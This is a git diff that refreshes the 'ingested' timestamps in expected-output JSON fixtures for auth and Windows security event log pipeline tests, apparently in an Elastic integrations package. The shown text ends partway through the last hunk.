diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json
index 60373130477..024b2254770 100644
--- a/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json
+++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json
@@ -24,7 +24,7 @@
 "hostname": "localhost"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.074170376Z",
+ "ingested": "2021-12-09T13:45:43.747682Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -57,7 +57,7 @@
 "hostname": "localhost"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.074173019Z",
+ "ingested": "2021-12-09T13:45:43.747690700Z",
 "timezone": "+0000",
 "kind": "event"
 },
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json
index 5121f7a7daf..f5f8681e353 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json
@@ -43,7 +43,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.210685383Z",
+ "ingested": "2021-12-09T13:45:43.972797500Z",
 "code": "1100",
 "provider": "Microsoft-Windows-Eventlog",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json
index fd9d2cf1af5..dd880a80804 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json
@@ -58,7 +58,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.277567227Z",
+ "ingested": "2021-12-09T13:45:44.108025700Z",
 "code": "1102",
 "provider": "Microsoft-Windows-Eventlog",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json
index 00edb676c4b..209697bd443 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json
@@ -43,7 +43,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.363927318Z",
+ "ingested": "2021-12-09T13:45:44.290473500Z",
 "code": "1104",
 "provider": "Microsoft-Windows-Eventlog",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json
index c5a5cacc050..229ed6b96ef 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json
@@ -48,7 +48,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.430369089Z",
+ "ingested": "2021-12-09T13:45:44.408439300Z",
 "code": "1105",
 "provider": "Microsoft-Windows-Eventlog",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json
index 431e11e5642..0a2df7e9eae 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json
@@ -74,7 +74,7 @@
 "name": "DC01.contoso.local"
 },
 "event": {
- "ingested": "2021-11-11T21:31:58.908808600Z",
+ "ingested": "2021-12-09T13:45:44.539859Z",
 "code": "4663",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json
index bf4eb4c0808..9c85d035dd3 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json
@@ -73,7 +73,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.507902320Z",
+ "ingested": "2021-12-09T13:45:44.690319700Z",
 "code": "4670",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json
index 98f2ff26a00..469ff90b096 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json
@@ -78,7 +78,7 @@
 "name": "DC01.contoso.local"
 },
 "event": {
- "ingested": "2021-11-11T21:31:59.255100300Z",
+ "ingested": "2021-12-09T13:45:44.903413300Z",
 "code": "4674",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json
index 9b1bdbd890e..54b8be2335c 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json
@@ -67,7 +67,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.604639736Z",
+ "ingested": "2021-12-09T13:45:45.106391100Z",
 "code": "4706",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json
index 8d182b50c70..5b16cece242 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json
@@ -59,7 +59,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.728582773Z",
+ "ingested": "2021-12-09T13:45:45.304077500Z",
 "code": "4707",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json
index 06305b42335..d79374ea1ce 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json
@@ -59,7 +59,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.821134433Z",
+ "ingested": "2021-12-09T13:45:45.483796500Z",
 "code": "4713",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json
index 9b08bd8a0ca..14e520329c0 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json
@@ -67,7 +67,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:03.907403986Z",
+ "ingested": "2021-12-09T13:45:45.661333200Z",
 "code": "4716",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json
index 3812504773b..0eda1467ded 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json
@@ -60,7 +60,7 @@
 "name": "WIN-BVM4LI1L1Q6"
 },
 "event": {
- "ingested": "2021-07-30T21:06:04.009850915Z",
+ "ingested": "2021-12-09T13:45:45.852303500Z",
 "code": "4717",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json
index 86dad902f97..35e09f28bef 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json
@@ -60,7 +60,7 @@
 "name": "WIN-BVM4LI1L1Q6"
 },
 "event": {
- "ingested": "2021-07-30T21:06:04.108098395Z",
+ "ingested": "2021-12-09T13:45:46.036199Z",
 "code": "4718",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json
index 623b7595f69..cbe653566e4 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json
@@ -67,7 +67,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:04.210865594Z",
+ "ingested": "2021-12-09T13:45:46.213355200Z",
 "code": "4719",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json
index 531748ad56e..33448147c89 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json
@@ -68,7 +68,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:04.305804272Z",
+ "ingested": "2021-12-09T13:45:46.399837400Z",
 "code": "4719",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json
index e9b2bfa88b3..bb727351068 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json
@@ -66,7 +66,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:04.395925335Z",
+ "ingested": "2021-12-09T13:45:46.588490400Z",
 "code": "4739",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json
index ba1a5882843..5b1f65f4192 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json
@@ -68,7 +68,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:04.486864362Z",
+ "ingested": "2021-12-09T13:45:46.772189Z",
 "code": "4743",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json
index b70044a19c8..ba037feef6c 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json
@@ -63,7 +63,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:04.577585617Z",
+ "ingested": "2021-12-09T13:45:46.953035400Z",
 "code": "4744",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json
index f43fcad8709..0f4f115b078 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json
@@ -63,7 +63,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:04.673943592Z",
+ "ingested": "2021-12-09T13:45:47.159830400Z",
 "code": "4745",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json
index 53b8272dc4a..080211b5cbb 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json
@@ -64,7 +64,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-10-19T11:55:16.331823600Z",
+ "ingested": "2021-12-09T13:45:47.362122900Z",
 "code": "4746",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json
index cc50850b535..6747dcd6d3b 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json
@@ -64,7 +64,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-10-19T11:55:16.621125Z",
+ "ingested": "2021-12-09T13:45:47.619501500Z",
 "code": "4747",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json
index ba4efecabb9..5284df6be39 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json
@@ -61,7 +61,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:05.001219691Z",
+ "ingested": "2021-12-09T13:45:47.872340400Z",
 "code": "4748",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json
index 3ce9e8d951b..664c3099fc3 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json
@@ -63,7 +63,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:05.091820461Z",
+ "ingested": "2021-12-09T13:45:48.060639100Z",
 "code": "4749",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json
index bf48d48d9eb..c1269a77ab7 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json
@@ -63,7 +63,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:05.199584474Z",
+ "ingested": "2021-12-09T13:45:48.257955300Z",
 "code": "4750",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json
index 6a73c84145e..8dfdfc48e48 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json
@@ -64,7 +64,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-10-19T11:55:17.565769200Z",
+ "ingested": "2021-12-09T13:45:48.462964900Z",
 "code": "4751",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json
index d304bdf51ba..442e3fd7d1b 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json
@@ -64,7 +64,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-10-19T11:55:17.906691Z",
+ "ingested": "2021-12-09T13:45:48.720114100Z",
 "code": "4752",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json
index a8708a15310..295846351c0 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json
@@ -61,7 +61,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:05.514297184Z",
+ "ingested": "2021-12-09T13:45:48.972013Z",
 "code": "4753",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json
index 0d5a5129521..18dece12a65 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json
@@ -63,7 +63,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:05.603328858Z",
+ "ingested": "2021-12-09T13:45:49.162535600Z",
 "code": "4759",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json
index 3f1539563b2..60497ade63b 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json
@@ -63,7 +63,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:05.696609273Z",
+ "ingested": "2021-12-09T13:45:49.356213Z",
 "code": "4760",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json
index ffeefc7e13d..1c4f746a96e 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json
@@ -64,7 +64,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-10-19T11:55:18.871413700Z",
+ "ingested": "2021-12-09T13:45:49.561917300Z",
 "code": "4761",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json
index c89878956f6..f8891896198 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json
@@ -64,7 +64,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-10-19T11:55:19.143941900Z",
+ "ingested": "2021-12-09T13:45:49.822688Z",
 "code": "4762",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json
index 85eb75204b3..1adcefc4726 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json
@@ -61,7 +61,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.011624475Z",
+ "ingested": "2021-12-09T13:45:50.082779300Z",
 "code": "4763",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json
index 9e77961ce6a..68ec14da47f 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json
@@ -65,7 +65,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.112340859Z",
+ "ingested": "2021-12-09T13:45:50.270227300Z",
 "code": "4817",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json
index 9f0ed30d088..b170f36ffed 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json
@@ -47,7 +47,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.211058573Z",
+ "ingested": "2021-12-09T13:45:50.449397500Z",
 "code": "4902",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json
index 5a8596a512c..270cb476576 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json
@@ -65,7 +65,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.298461393Z",
+ "ingested": "2021-12-09T13:45:50.573813200Z",
 "code": "4904",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json
index 4f7bb34466c..cb85f92ff19 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json
@@ -65,7 +65,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.399764322Z",
+ "ingested": "2021-12-09T13:45:50.772922Z",
 "code": "4905",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json
index 99797402671..965c931df7c 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json
@@ -46,7 +46,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.484704505Z",
+ "ingested": "2021-12-09T13:45:50.972826900Z",
 "code": "4906",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json
index a3947ad8eca..39289698950 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json
@@ -68,7 +68,7 @@
 "name": "WIN-BVM4LI1L1Q6.TEST.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.556720769Z",
+ "ingested": "2021-12-09T13:45:51.090769700Z",
 "code": "4907",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json
index ee2ad9bc4d3..cc400c86fe1 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json
@@ -67,7 +67,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.646748482Z",
+ "ingested": "2021-12-09T13:45:51.283482500Z",
 "code": "4673",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json
index 5e786130bb3..2df6677e8d6 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json
@@ -67,7 +67,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.724198887Z",
+ "ingested": "2021-12-09T13:45:51.472412500Z",
 "code": "4697",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json
index 5ded5e448a0..9f0d8dc52ac 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json
@@ -77,7 +77,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-10-19T11:55:21.246497500Z",
+ "ingested": "2021-12-09T13:45:51.665278200Z",
 "code": "4768",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json
index fb250fd3745..f7cfee07f33 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json
@@ -76,7 +76,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:06.934995191Z",
+ "ingested": "2021-12-09T13:45:51.894330100Z",
 "code": "4769",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json
index 41e6edbad5d..25f40fe47fd 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json
@@ -71,7 +71,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.047425653Z",
